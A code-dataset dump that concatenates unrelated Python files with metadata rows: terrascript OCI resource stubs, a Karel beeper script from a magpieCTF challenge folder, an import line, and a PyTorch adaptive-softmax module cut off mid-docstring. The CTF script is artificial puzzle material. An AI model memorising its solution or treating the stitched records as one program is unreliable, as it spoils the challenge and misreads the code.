class oci_database_external_pluggable_database_management(terrascript.Resource):
pass
class oci_database_external_pluggable_database_operations_insights_management(
terrascript.Resource
):
pass
class oci_database_key_store(terrascript.Resource):
pass
class oci_database_maintenance_run(terrascript.Resource):
pass
class oci_database_management_db_management_private_endpoint(terrascript.Resource):
pass
class oci_database_management_managed_database_group(terrascript.Resource):
pass
class oci_database_management_managed_databases_change_database_parameter(
terrascript.Resource
):
pass
class oci_database_management_managed_databases_reset_database_parameter(
terrascript.Resource
):
pass
class oci_database_migration(terrascript.Resource):
pass
class oci_database_migration_agent(terrascript.Resource):
pass
class oci_database_migration_connection(terrascript.Resource):
pass
class oci_database_migration_job(terrascript.Resource):
pass
class oci_database_migration_migration(terrascript.Resource):
pass
class oci_database_pluggable_database(terrascript.Resource):
pass
class oci_database_pluggable_databases_local_clone(terrascript.Resource):
pass
class oci_database_pluggable_databases_remote_clone(terrascript.Resource):
pass
class oci_database_vm_cluster(terrascript.Resource):
pass
class oci_database_vm_cluster_network(terrascript.Resource):
pass
class oci_datacatalog_catalog(terrascript.Resource):
pass
class oci_datacatalog_catalog_private_endpoint(terrascript.Resource):
pass
class oci_datacatalog_connection(terrascript.Resource):
pass
class oci_datacatalog_data_asset(terrascript.Resource):
pass
class oci_datacatalog_metastore(terrascript.Resource):
pass
class oci_dataflow_application(terrascript.Resource):
pass
class oci_dataflow_invoke_run(terrascript.Resource):
pass
class oci_dataflow_private_endpoint(terrascript.Resource):
pass
class oci_dataintegration_workspace(terrascript.Resource):
pass
class oci_datascience_job(terrascript.Resource):
pass
class oci_datascience_job_run(terrascript.Resource):
pass
class oci_datascience_model(terrascript.Resource):
pass
class oci_datascience_model_deployment(terrascript.Resource):
pass
class oci_datascience_model_provenance(terrascript.Resource):
pass
class oci_datascience_notebook_session(terrascript.Resource):
pass
class oci_datascience_project(terrascript.Resource):
pass
class oci_devops_deploy_artifact(terrascript.Resource):
pass
class oci_devops_deploy_environment(terrascript.Resource):
pass
class oci_devops_deploy_pipeline(terrascript.Resource):
pass
class oci_devops_deploy_stage(terrascript.Resource):
pass
class oci_devops_deployment(terrascript.Resource):
pass
class oci_devops_project(terrascript.Resource):
pass
class oci_dns_record(terrascript.Resource):
pass
class oci_dns_resolver(terrascript.Resource):
pass
class oci_dns_resolver_endpoint(terrascript.Resource):
pass
class oci_dns_rrset(terrascript.Resource):
pass
class oci_dns_steering_policy(terrascript.Resource):
pass
class oci_dns_steering_policy_attachment(terrascript.Resource):
pass
class oci_dns_tsig_key(terrascript.Resource):
pass
class oci_dns_view(terrascript.Resource):
pass
class oci_dns_zone(terrascript.Resource):
pass
class oci_email_dkim(terrascript.Resource):
pass
class oci_email_email_domain(terrascript.Resource):
pass
class oci_email_sender(terrascript.Resource):
pass
class oci_email_suppression(terrascript.Resource):
pass
class oci_events_rule(terrascript.Resource):
pass
class oci_file_storage_export(terrascript.Resource):
pass
class oci_file_storage_export_set(terrascript.Resource):
pass
class oci_file_storage_file_system(terrascript.Resource):
pass
class oci_file_storage_mount_target(terrascript.Resource):
pass
class oci_file_storage_snapshot(terrascript.Resource):
pass
class oci_functions_application(terrascript.Resource):
pass
class oci_functions_function(terrascript.Resource):
pass
class oci_functions_invoke_function(terrascript.Resource):
pass
class oci_generic_artifacts_content_artifact_by_path(terrascript.Resource):
pass
class oci_golden_gate_database_registration(terrascript.Resource):
pass
class oci_golden_gate_deployment(terrascript.Resource):
pass
class oci_golden_gate_deployment_backup(terrascript.Resource):
pass
class oci_health_checks_http_monitor(terrascript.Resource):
pass
class oci_health_checks_http_probe(terrascript.Resource):
pass
class oci_health_checks_ping_monitor(terrascript.Resource):
pass
class oci_health_checks_ping_probe(terrascript.Resource):
pass
class oci_identity_api_key(terrascript.Resource):
pass
class oci_identity_auth_token(terrascript.Resource):
pass
class oci_identity_authentication_policy(terrascript.Resource):
pass
class oci_identity_compartment(terrascript.Resource):
pass
class oci_identity_customer_secret_key(terrascript.Resource):
pass
class oci_identity_dynamic_group(terrascript.Resource):
pass
class oci_identity_group(terrascript.Resource):
pass
class oci_identity_identity_provider(terrascript.Resource):
pass
class oci_identity_idp_group_mapping(terrascript.Resource):
pass
class oci_identity_network_source(terrascript.Resource):
pass
class oci_identity_policy(terrascript.Resource):
pass
class oci_identity_smtp_credential(terrascript.Resource):
pass
class oci_identity_swift_password(terrascript.Resource):
pass
class oci_identity_tag(terrascript.Resource):
pass
class oci_identity_tag_default(terrascript.Resource):
pass
class oci_identity_tag_namespace(terrascript.Resource):
pass
class oci_identity_ui_password(terrascript.Resource):
pass
class oci_identity_user(terrascript.Resource):
pass
class oci_identity_user_capabilities_management(terrascript.Resource):
pass
class oci_identity_user_group_membership(terrascript.Resource):
pass
class oci_integration_integration_instance(terrascript.Resource):
pass
class oci_jms_fleet(terrascript.Resource):
pass
class oci_kms_encrypted_data(terrascript.Resource):
pass
class oci_kms_generated_key(terrascript.Resource):
pass
class oci_kms_key(terrascript.Resource):
pass
class oci_kms_key_version(terrascript.Resource):
pass
class oci_kms_sign(terrascript.Resource):
pass
class oci_kms_vault(terrascript.Resource):
pass
class oci_kms_vault_replication(terrascript.Resource):
pass
class oci_kms_verify(terrascript.Resource):
pass
class oci_limits_quota(terrascript.Resource):
pass
class oci_load_balancer(terrascript.Resource):
pass
class oci_load_balancer_backend(terrascript.Resource):
pass
class oci_load_balancer_backend_set(terrascript.Resource):
pass
class oci_load_balancer_backendset(terrascript.Resource):
pass
class oci_load_balancer_certificate(terrascript.Resource):
pass
class oci_load_balancer_hostname(terrascript.Resource):
pass
class oci_load_balancer_listener(terrascript.Resource):
pass
class oci_load_balancer_load_balancer(terrascript.Resource):
pass
class oci_load_balancer_load_balancer_routing_policy(terrascript.Resource):
pass
class oci_load_balancer_path_route_set(terrascript.Resource):
pass
class oci_load_balancer_rule_set(terrascript.Resource):
pass
class oci_load_balancer_ssl_cipher_suite(terrascript.Resource):
pass
class oci_log_analytics_log_analytics_entity(terrascript.Resource):
pass
class oci_log_analytics_log_analytics_import_custom_content(terrascript.Resource):
pass
class oci_log_analytics_log_analytics_log_group(terrascript.Resource):
pass
class oci_log_analytics_log_analytics_object_collection_rule(terrascript.Resource):
pass
class oci_log_analytics_namespace(terrascript.Resource):
pass
class oci_logging_log(terrascript.Resource):
pass
class oci_logging_log_group(terrascript.Resource):
pass
class oci_logging_log_saved_search(terrascript.Resource):
pass
class oci_logging_unified_agent_configuration(terrascript.Resource):
pass
class oci_management_agent_management_agent(terrascript.Resource):
pass
class oci_management_agent_management_agent_install_key(terrascript.Resource):
pass
class oci_management_dashboard_management_dashboards_import(terrascript.Resource):
pass
class oci_marketplace_accepted_agreement(terrascript.Resource):
pass
class oci_marketplace_listing_package_agreement(terrascript.Resource):
pass
class oci_marketplace_publication(terrascript.Resource):
pass
class oci_metering_computation_custom_table(terrascript.Resource):
pass
class oci_metering_computation_query(terrascript.Resource):
pass
class oci_metering_computation_usage(terrascript.Resource):
pass
class oci_monitoring_alarm(terrascript.Resource):
pass
class oci_mysql_analytics_cluster(terrascript.Resource):
pass
class oci_mysql_channel(terrascript.Resource):
pass
class oci_mysql_heat_wave_cluster(terrascript.Resource):
pass
class oci_mysql_mysql_backup(terrascript.Resource):
pass
class oci_mysql_mysql_db_system(terrascript.Resource):
pass
class oci_network_load_balancer_backend(terrascript.Resource):
pass
class oci_network_load_balancer_backend_set(terrascript.Resource):
pass
class oci_network_load_balancer_listener(terrascript.Resource):
pass
class oci_network_load_balancer_network_load_balancer(terrascript.Resource):
pass
class oci_nosql_index(terrascript.Resource):
pass
class oci_nosql_table(terrascript.Resource):
pass
class oci_objectstorage_bucket(terrascript.Resource):
pass
class oci_objectstorage_namespace_metadata(terrascript.Resource):
pass
class oci_objectstorage_object(terrascript.Resource):
pass
class oci_objectstorage_object_lifecycle_policy(terrascript.Resource):
pass
class oci_objectstorage_preauthrequest(terrascript.Resource):
pass
class oci_objectstorage_replication_policy(terrascript.Resource):
pass
class oci_oce_oce_instance(terrascript.Resource):
pass
class oci_ocvp_esxi_host(terrascript.Resource):
pass
class oci_ocvp_sddc(terrascript.Resource):
pass
class oci_oda_oda_instance(terrascript.Resource):
pass
class oci_ons_notification_topic(terrascript.Resource):
pass
class oci_ons_subscription(terrascript.Resource):
pass
class oci_opsi_database_insight(terrascript.Resource):
pass
class oci_opsi_enterprise_manager_bridge(terrascript.Resource):
pass
class oci_opsi_host_insight(terrascript.Resource):
pass
class oci_optimizer_enrollment_status(terrascript.Resource):
pass
class oci_optimizer_profile(terrascript.Resource):
pass
class oci_optimizer_recommendation(terrascript.Resource):
pass
class oci_optimizer_resource_action(terrascript.Resource):
pass
class oci_osmanagement_managed_instance(terrascript.Resource):
pass
class oci_osmanagement_managed_instance_group(terrascript.Resource):
pass
class oci_osmanagement_managed_instance_management(terrascript.Resource):
pass
class oci_osmanagement_software_source(terrascript.Resource):
pass
class oci_sch_service_connector(terrascript.Resource):
pass
class oci_service_catalog_private_application(terrascript.Resource):
pass
class oci_service_catalog_service_catalog(terrascript.Resource):
pass
class oci_service_catalog_service_catalog_association(terrascript.Resource):
pass
class oci_streaming_connect_harness(terrascript.Resource):
pass
class oci_streaming_stream(terrascript.Resource):
pass
class oci_streaming_stream_pool(terrascript.Resource):
pass
class oci_vulnerability_scanning_container_scan_recipe(terrascript.Resource):
pass
class oci_vulnerability_scanning_container_scan_target(terrascript.Resource):
pass
class oci_vulnerability_scanning_host_scan_recipe(terrascript.Resource):
pass
class oci_vulnerability_scanning_host_scan_target(terrascript.Resource):
pass
class oci_waas_address_list(terrascript.Resource):
pass
class oci_waas_certificate(terrascript.Resource):
pass
class oci_waas_custom_protection_rule(terrascript.Resource):
pass
class oci_waas_http_redirect(terrascript.Resource):
pass
class oci_waas_protection_rule(terrascript.Resource):
pass
class oci_waas_purge_cache(terrascript.Resource):
pass
class oci_waas_waas_policy(terrascript.Resource):
pass
__all__ = [
"oci_ai_anomaly_detection_ai_private_endpoint",
"oci_ai_anomaly_detection_data_asset",
"oci_ai_anomaly_detection_model",
"oci_ai_anomaly_detection_project",
"oci_analytics_analytics_instance",
"oci_analytics_analytics_instance_private_access_channel",
"oci_analytics_analytics_instance_vanity_url",
"oci_apigateway_api",
"oci_apigateway_certificate",
"oci_apigateway_deployment",
"oci_apigateway_gateway",
"oci_apm_apm_domain",
"oci_apm_synthetics_monitor",
"oci_apm_synthetics_script",
"oci_artifacts_container_configuration",
"oci_artifacts_container_image_signature",
"oci_artifacts_container_repository",
"oci_artifacts_generic_artifact",
"oci_artifacts_repository",
"oci_audit_configuration",
"oci_autoscaling_auto_scaling_configuration",
"oci_bastion_bastion",
"oci_bastion_session",
"oci_bds_auto_scaling_configuration",
"oci_bds_bds_instance",
"oci_blockchain_blockchain_platform",
"oci_blockchain_osn",
"oci_blockchain_peer",
"oci_budget_alert_rule",
"oci_budget_budget",
"oci_cloud_guard_cloud_guard_configuration",
"oci_cloud_guard_data_mask_rule",
"oci_cloud_guard_detector_recipe",
"oci_cloud_guard_managed_list",
"oci_cloud_guard_responder_recipe",
"oci_cloud_guard_target",
"oci_containerengine_cluster",
"oci_containerengine_node_pool",
"oci_core_app_catalog_listing_resource_version_agreement",
"oci_core_app_catalog_subscription",
"oci_core_boot_volume",
"oci_core_boot_volume_backup",
"oci_core_cluster_network",
"oci_core_compute_capacity_reservation",
"oci_core_compute_image_capability_schema",
"oci_core_console_history",
"oci_core_cpe",
"oci_core_cross_connect",
"oci_core_cross_connect_group",
"oci_core_dedicated_vm_host",
"oci_core_default_dhcp_options",
"oci_core_default_route_table",
"oci_core_default_security_list",
"oci_core_dhcp_options",
"oci_core_drg",
"oci_core_drg_attachment",
"oci_core_drg_attachment_management",
"oci_core_drg_attachments_list",
"oci_core_drg_route_distribution",
"oci_core_drg_route_distribution_statement",
"oci_core_drg_route_table",
"oci_core_drg_route_table_route_rule",
"oci_core_image",
"oci_core_instance",
"oci_core_instance_configuration",
"oci_core_instance_console_connection",
"oci_core_instance_pool",
"oci_core_instance_pool_instance",
"oci_core_internet_gateway",
"oci_core_ipsec",
"oci_core_ipsec_connection_tunnel_management",
"oci_core_ipv6",
"oci_core_listing_resource_version_agreement",
"oci_core_local_peering_gateway",
"oci_core_nat_gateway",
"oci_core_network_security_group",
"oci_core_network_security_group_security_rule",
"oci_core_private_ip",
"oci_core_public_ip",
"oci_core_public_ip_pool",
"oci_core_public_ip_pool_capacity",
"oci_core_remote_peering_connection",
"oci_core_route_table",
"oci_core_route_table_attachment",
"oci_core_security_list",
"oci_core_service_gateway",
"oci_core_shape_management",
"oci_core_subnet",
"oci_core_vcn",
"oci_core_virtual_circuit",
"oci_core_virtual_network",
"oci_core_vlan",
"oci_core_vnic_attachment",
"oci_core_volume",
"oci_core_volume_attachment",
"oci_core_volume_backup",
"oci_core_volume_backup_policy",
"oci_core_volume_backup_policy_assignment",
"oci_core_volume_group",
"oci_core_volume_group_backup",
"oci_data_safe_data_safe_configuration",
"oci_data_safe_data_safe_private_endpoint",
"oci_data_safe_on_prem_connector",
"oci_data_safe_target_database",
"oci_database_autonomous_container_database",
"oci_database_autonomous_container_database_dataguard_association_operation",
"oci_database_autonomous_database",
"oci_database_autonomous_database_backup",
"oci_database_autonomous_database_instance_wallet_management",
"oci_database_autonomous_database_regional_wallet_management",
"oci_database_autonomous_database_wallet",
"oci_database_autonomous_exadata_infrastructure",
"oci_database_autonomous_vm_cluster",
"oci_database_backup",
"oci_database_backup_destination",
"oci_database_cloud_database_management",
"oci_database_cloud_exadata_infrastructure",
"oci_database_cloud_vm_cluster",
"oci_database_data_guard_association",
"oci_database_database",
"oci_database_database_software_image",
"oci_database_database_upgrade",
"oci_database_db_home",
"oci_database_db_node_console_connection",
"oci_database_db_system",
"oci_database_exadata_infrastructure",
"oci_database_exadata_infrastructure_storage",
"oci_database_exadata_iorm_config",
"oci_database_external_container_database",
"oci_database_external_container_database_management",
"oci_database_external_database_connector",
"oci_database_external_non_container_database",
"oci_database_external_non_container_database_management",
"oci_database_external_non_container_database_operations_insights_management",
"oci_database_external_pluggable_database",
"oci_database_external_pluggable_database_management",
"oci_database_external_pluggable_database_operations_insights_management",
"oci_database_key_store",
"oci_database_maintenance_run",
"oci_database_management_db_management_private_endpoint",
"oci_database_management_managed_database_group",
"oci_database_management_managed_databases_change_database_parameter",
"oci_database_management_managed_databases_reset_database_parameter",
"oci_database_migration",
"oci_database_migration_agent",
"oci_database_migration_connection",
"oci_database_migration_job",
"oci_database_migration_migration",
"oci_database_pluggable_database",
"oci_database_pluggable_databases_local_clone",
"oci_database_pluggable_databases_remote_clone",
"oci_database_vm_cluster",
"oci_database_vm_cluster_network",
"oci_datacatalog_catalog",
"oci_datacatalog_catalog_private_endpoint",
"oci_datacatalog_connection",
"oci_datacatalog_data_asset",
"oci_datacatalog_metastore",
"oci_dataflow_application",
"oci_dataflow_invoke_run",
"oci_dataflow_private_endpoint",
"oci_dataintegration_workspace",
"oci_datascience_job",
"oci_datascience_job_run",
"oci_datascience_model",
"oci_datascience_model_deployment",
"oci_datascience_model_provenance",
"oci_datascience_notebook_session",
"oci_datascience_project",
"oci_devops_deploy_artifact",
"oci_devops_deploy_environment",
"oci_devops_deploy_pipeline",
"oci_devops_deploy_stage",
"oci_devops_deployment",
"oci_devops_project",
"oci_dns_record",
"oci_dns_resolver",
"oci_dns_resolver_endpoint",
"oci_dns_rrset",
"oci_dns_steering_policy",
"oci_dns_steering_policy_attachment",
"oci_dns_tsig_key",
"oci_dns_view",
"oci_dns_zone",
"oci_email_dkim",
"oci_email_email_domain",
"oci_email_sender",
"oci_email_suppression",
"oci_events_rule",
"oci_file_storage_export",
"oci_file_storage_export_set",
"oci_file_storage_file_system",
"oci_file_storage_mount_target",
"oci_file_storage_snapshot",
"oci_functions_application",
"oci_functions_function",
"oci_functions_invoke_function",
"oci_generic_artifacts_content_artifact_by_path",
"oci_golden_gate_database_registration",
"oci_golden_gate_deployment",
"oci_golden_gate_deployment_backup",
"oci_health_checks_http_monitor",
"oci_health_checks_http_probe",
"oci_health_checks_ping_monitor",
"oci_health_checks_ping_probe",
"oci_identity_api_key",
"oci_identity_auth_token",
"oci_identity_authentication_policy",
"oci_identity_compartment",
"oci_identity_customer_secret_key",
"oci_identity_dynamic_group",
"oci_identity_group",
"oci_identity_identity_provider",
"oci_identity_idp_group_mapping",
"oci_identity_network_source",
"oci_identity_policy",
"oci_identity_smtp_credential",
"oci_identity_swift_password",
"oci_identity_tag",
"oci_identity_tag_default",
"oci_identity_tag_namespace",
"oci_identity_ui_password",
"oci_identity_user",
"oci_identity_user_capabilities_management",
"oci_identity_user_group_membership",
"oci_integration_integration_instance",
"oci_jms_fleet",
"oci_kms_encrypted_data",
"oci_kms_generated_key",
"oci_kms_key",
"oci_kms_key_version",
"oci_kms_sign",
"oci_kms_vault",
"oci_kms_vault_replication",
"oci_kms_verify",
"oci_limits_quota",
"oci_load_balancer",
"oci_load_balancer_backend",
"oci_load_balancer_backend_set",
"oci_load_balancer_backendset",
"oci_load_balancer_certificate",
"oci_load_balancer_hostname",
"oci_load_balancer_listener",
"oci_load_balancer_load_balancer",
"oci_load_balancer_load_balancer_routing_policy",
"oci_load_balancer_path_route_set",
"oci_load_balancer_rule_set",
"oci_load_balancer_ssl_cipher_suite",
"oci_log_analytics_log_analytics_entity",
"oci_log_analytics_log_analytics_import_custom_content",
"oci_log_analytics_log_analytics_log_group",
"oci_log_analytics_log_analytics_object_collection_rule",
"oci_log_analytics_namespace",
"oci_logging_log",
"oci_logging_log_group",
"oci_logging_log_saved_search",
"oci_logging_unified_agent_configuration",
"oci_management_agent_management_agent",
"oci_management_agent_management_agent_install_key",
"oci_management_dashboard_management_dashboards_import",
"oci_marketplace_accepted_agreement",
"oci_marketplace_listing_package_agreement",
"oci_marketplace_publication",
"oci_metering_computation_custom_table",
"oci_metering_computation_query",
"oci_metering_computation_usage",
"oci_monitoring_alarm",
"oci_mysql_analytics_cluster",
"oci_mysql_channel",
"oci_mysql_heat_wave_cluster",
"oci_mysql_mysql_backup",
"oci_mysql_mysql_db_system",
"oci_network_load_balancer_backend",
"oci_network_load_balancer_backend_set",
"oci_network_load_balancer_listener",
"oci_network_load_balancer_network_load_balancer",
"oci_nosql_index",
"oci_nosql_table",
"oci_objectstorage_bucket",
"oci_objectstorage_namespace_metadata",
"oci_objectstorage_object",
"oci_objectstorage_object_lifecycle_policy",
"oci_objectstorage_preauthrequest",
"oci_objectstorage_replication_policy",
"oci_oce_oce_instance",
"oci_ocvp_esxi_host",
"oci_ocvp_sddc",
"oci_oda_oda_instance",
"oci_ons_notification_topic",
"oci_ons_subscription",
"oci_opsi_database_insight",
"oci_opsi_enterprise_manager_bridge",
"oci_opsi_host_insight",
"oci_optimizer_enrollment_status",
"oci_optimizer_profile",
"oci_optimizer_recommendation",
"oci_optimizer_resource_action",
"oci_osmanagement_managed_instance",
"oci_osmanagement_managed_instance_group",
"oci_osmanagement_managed_instance_management",
"oci_osmanagement_software_source",
"oci_sch_service_connector",
"oci_service_catalog_private_application",
"oci_service_catalog_service_catalog",
"oci_service_catalog_service_catalog_association",
"oci_streaming_connect_harness",
"oci_streaming_stream",
"oci_streaming_stream_pool",
"oci_vulnerability_scanning_container_scan_recipe",
"oci_vulnerability_scanning_container_scan_target",
"oci_vulnerability_scanning_host_scan_recipe",
"oci_vulnerability_scanning_host_scan_target",
"oci_waas_address_list",
"oci_waas_certificate",
"oci_waas_custom_protection_rule",
"oci_waas_http_redirect",
"oci_waas_protection_rule",
"oci_waas_purge_cache",
"oci_waas_waas_policy",
]
| 21.429634 | 88 | 0.804316 | 4,129 | 34,566 | 6.201017 | 0.080165 | 0.237463 | 0.286557 | 0.347758 | 0.815185 | 0.707429 | 0.497266 | 0.276871 | 0.119161 | 0.036557 | 0 | 0.000466 | 0.130591 | 34,566 | 1,612 | 89 | 21.442928 | 0.851524 | 0.003153 | 0 | 0.339175 | 1 | 0 | 0.272189 | 0.241888 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | false | 0.33299 | 0.005155 | 0 | 0.334021 | 0 | 0 | 0 | 0 | null | 1 | 1 | 1 | 1 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 7 |
4e80dcace66632aca1131901eb76966fd4c1d00a | 1,633 | py | Python | challenges/misc/karel/source/challenge.py | infosec-ucalgary/magpieCTF-2021 | 78459a1e16ac3a135e891c2246232c4890960b92 | [
"MIT"
] | 18 | 2021-02-22T00:09:27.000Z | 2022-02-28T14:23:33.000Z | challenges/misc/karel/source/challenge.py | infosec-ucalgary/magpieCTF-2021 | 78459a1e16ac3a135e891c2246232c4890960b92 | [
"MIT"
] | null | null | null | challenges/misc/karel/source/challenge.py | infosec-ucalgary/magpieCTF-2021 | 78459a1e16ac3a135e891c2246232c4890960b92 | [
"MIT"
] | 6 | 2021-02-22T01:32:10.000Z | 2022-02-25T15:48:42.000Z | from karel import *
begin_karel_program()
turn_left()
pick_beeper()
put_beeper()
turn_left()
turn_left()
pick_beeper()
move()
turn_left()
turn_left()
pick_beeper()
turn_left()
put_beeper()
turn_left()
put_beeper()
move()
move()
turn_left()
pick_beeper()
pick_beeper()
turn_left()
turn_left()
pick_beeper()
turn_left()
turn_left()
turn_left()
put_beeper()
pick_beeper()
pick_beeper()
turn_left()
move()
pick_beeper()
put_beeper()
move()
put_beeper()
turn_left()
move()
turn_left()
put_beeper()
move()
pick_beeper()
move()
put_beeper()
move()
put_beeper()
move()
put_beeper()
move()
turn_left()
turn_left()
turn_left()
put_beeper()
put_beeper()
move()
put_beeper()
move()
turn_left()
move()
put_beeper()
turn_left()
turn_left()
turn_left()
turn_left()
put_beeper()
put_beeper()
move()
put_beeper()
turn_left()
move()
turn_left()
turn_left()
put_beeper()
put_beeper()
move()
put_beeper()
turn_left()
pick_beeper()
turn_left()
put_beeper()
move()
pick_beeper()
move()
put_beeper()
move()
put_beeper()
move()
put_beeper()
turn_left()
move()
move()
put_beeper()
turn_left()
put_beeper()
turn_left()
turn_left()
put_beeper()
put_beeper()
move()
put_beeper()
turn_left()
put_beeper()
move()
put_beeper()
move()
put_beeper()
move()
put_beeper()
turn_left()
move()
turn_left()
move()
move()
put_beeper()
turn_left()
move()
pick_beeper()
move()
move()
put_beeper()
move()
put_beeper()
turn_left()
put_beeper()
move()
pick_beeper()
end_karel_program()
| 10.142857 | 22 | 0.647275 | 222 | 1,633 | 4.342342 | 0.054054 | 0.315353 | 0.256224 | 0.295643 | 0.915975 | 0.911826 | 0.835062 | 0.75 | 0.559129 | 0.554979 | 0 | 0 | 0.197795 | 1,633 | 160 | 23 | 10.20625 | 0.735878 | 0 | 0 | 0.976378 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | true | 0 | 0.007874 | 0 | 0.007874 | 0 | 0 | 0 | 0 | null | 1 | 1 | 1 | 1 | 1 | 1 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 9 |
4eaf4fddb2532ed8ece28d4789ff113e8581135e | 41 | py | Python | lib/analyzers/__init__.py | bertid/clean-pvnet | 8e1afdfe450c7d73274581d2907ad0215cba8331 | [
"Apache-2.0"
] | 284 | 2019-12-14T08:09:40.000Z | 2022-03-26T02:17:26.000Z | lib/analyzers/__init__.py | danikhani/clean-pvnet | 4f91324c5bc9d2a05624f49c6cad15a33a446106 | [
"Apache-2.0"
] | 208 | 2019-12-16T13:09:49.000Z | 2022-03-25T07:38:20.000Z | lib/analyzers/__init__.py | danikhani/clean-pvnet | 4f91324c5bc9d2a05624f49c6cad15a33a446106 | [
"Apache-2.0"
] | 88 | 2019-12-14T12:33:51.000Z | 2022-03-22T21:07:09.000Z | from .make_analyzer import make_analyzer
| 20.5 | 40 | 0.878049 | 6 | 41 | 5.666667 | 0.666667 | 0.705882 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0.097561 | 41 | 1 | 41 | 41 | 0.918919 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | true | 0 | 1 | 0 | 1 | 0 | 1 | 1 | 0 | null | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 1 | 0 | 1 | 0 | 0 | 7 |
4ebbbcbbc19e27838e6a787631eda194b13dc7ec | 35,072 | py | Python | src/utils/proj_adaptive_softmax.py | richardbaihe/robustLM | fb36aa08cd886ad98f431647d9cb128879bb4382 | [
"MIT"
] | 1 | 2022-03-21T15:12:58.000Z | 2022-03-21T15:12:58.000Z | src/utils/proj_adaptive_softmax.py | richardbaihe/robustLM | fb36aa08cd886ad98f431647d9cb128879bb4382 | [
"MIT"
] | null | null | null | src/utils/proj_adaptive_softmax.py | richardbaihe/robustLM | fb36aa08cd886ad98f431647d9cb128879bb4382 | [
"MIT"
] | null | null | null | from collections import defaultdict
import numpy as np
import torch
import torch.nn as nn
import torch.nn.functional as F
CUDA_MAJOR = int(torch.version.cuda.split(".")[0])
CUDA_MINOR = int(torch.version.cuda.split(".")[1])
class ProjectedAdaptiveLogSoftmax(nn.Module):
def __init__(self, n_token, d_embed, d_proj, cutoffs, div_val=1, keep_order=False):
super(ProjectedAdaptiveLogSoftmax, self).__init__()
self.n_token = n_token
self.d_embed = d_embed
self.d_proj = d_proj
self.cutoffs = cutoffs + [n_token]
self.cutoff_ends = [0] + self.cutoffs
self.div_val = div_val
self.shortlist_size = self.cutoffs[0]
self.n_clusters = len(self.cutoffs) - 1
self.head_size = self.shortlist_size + self.n_clusters
if self.n_clusters > 0:
self.cluster_weight = nn.Parameter(
torch.zeros(self.n_clusters, self.d_embed)
)
self.cluster_bias = nn.Parameter(torch.zeros(self.n_clusters))
self.out_layers = nn.ModuleList()
self.out_projs = nn.ParameterList()
if div_val == 1:
for i in range(len(self.cutoffs)):
if d_proj != d_embed:
self.out_projs.append(nn.Parameter(torch.Tensor(d_proj, d_embed)))
else:
self.out_projs.append(None)
self.out_layers.append(nn.Linear(d_embed, n_token))
else:
for i in range(len(self.cutoffs)):
l_idx, r_idx = self.cutoff_ends[i], self.cutoff_ends[i + 1]
d_emb_i = d_embed // (div_val ** i)
self.out_projs.append(nn.Parameter(torch.Tensor(d_proj, d_emb_i)))
self.out_layers.append(nn.Linear(d_emb_i, r_idx - l_idx))
self.keep_order = keep_order
def _compute_logit(self, hidden, weight, bias, proj):
if proj is None:
logit = F.linear(hidden, weight, bias=bias)
else:
# if CUDA_MAJOR <= 9 and CUDA_MINOR <= 1:
proj_hid = F.linear(hidden, proj.t().contiguous())
logit = F.linear(proj_hid, weight, bias=bias)
# else:
# logit = torch.einsum('bd,de,ev->bv', (hidden, proj, weight.t()))
# if bias is not None:
# logit = logit + bias
return logit
def forward(self, hidden, target, keep_order=False, learn_offset=False):
"""
hidden :: [len*bsz x d_proj]
target :: [len*bsz]
"""
if hidden.size(0) != target.size(0):
raise RuntimeError(
"Input and target should have the same size " "in the batch dimension."
)
if self.n_clusters == 0:
logit = self._compute_logit(
hidden,
self.out_layers[0].weight,
self.out_layers[0].bias,
self.out_projs[0],
)
nll = (
-F.log_softmax(logit, dim=-1).gather(1, target.unsqueeze(1)).squeeze(1)
)
else:
# construct weights and biases
weights, biases = [], []
for i in range(len(self.cutoffs)):
if self.div_val == 1:
l_idx, r_idx = self.cutoff_ends[i], self.cutoff_ends[i + 1]
weight_i = self.out_layers[0].weight[l_idx:r_idx]
bias_i = self.out_layers[0].bias[l_idx:r_idx]
else:
weight_i = self.out_layers[i].weight
bias_i = self.out_layers[i].bias
if i == 0:
weight_i = torch.cat([weight_i, self.cluster_weight], dim=0)
bias_i = torch.cat([bias_i, self.cluster_bias], dim=0)
weights.append(weight_i)
biases.append(bias_i)
head_weight, head_bias, head_proj = weights[0], biases[0], self.out_projs[0]
head_logit = self._compute_logit(hidden, head_weight, head_bias, head_proj)
# head_logit[:,0] = -float('inf')
head_logprob = F.log_softmax(head_logit, dim=1)
nll = torch.zeros_like(target, dtype=hidden.dtype, device=hidden.device)
offset = 0
cutoff_values = [0] + self.cutoffs
for i in range(len(cutoff_values) - 1):
l_idx, r_idx = cutoff_values[i], cutoff_values[i + 1]
mask_i = (target >= l_idx) & (target < r_idx)
indices_i = mask_i.nonzero().squeeze()
if indices_i.numel() == 0:
continue
target_i = target.index_select(0, indices_i) - l_idx
head_logprob_i = head_logprob.index_select(0, indices_i)
if i == 0:
logprob_i = head_logprob_i.gather(1, target_i[:, None]).squeeze(1)
else:
weight_i, bias_i, proj_i = weights[i], biases[i], self.out_projs[i]
hidden_i = hidden.index_select(0, indices_i)
tail_logit_i = self._compute_logit(
hidden_i, weight_i, bias_i, proj_i
)
tail_logprob_i = F.log_softmax(tail_logit_i, dim=1)
logprob_i = head_logprob_i[:, -i] + tail_logprob_i.gather(
1, target_i[:, None]
).squeeze(1)
if (hasattr(self, "keep_order") and self.keep_order) or keep_order:
nll.index_copy_(0, indices_i, -logprob_i)
else:
nll[offset : offset + logprob_i.size(0)].copy_(-logprob_i)
offset += logprob_i.size(0)
return nll
def get_top_50_words_and_props(self, hidden, target, keep_order=False):
"""
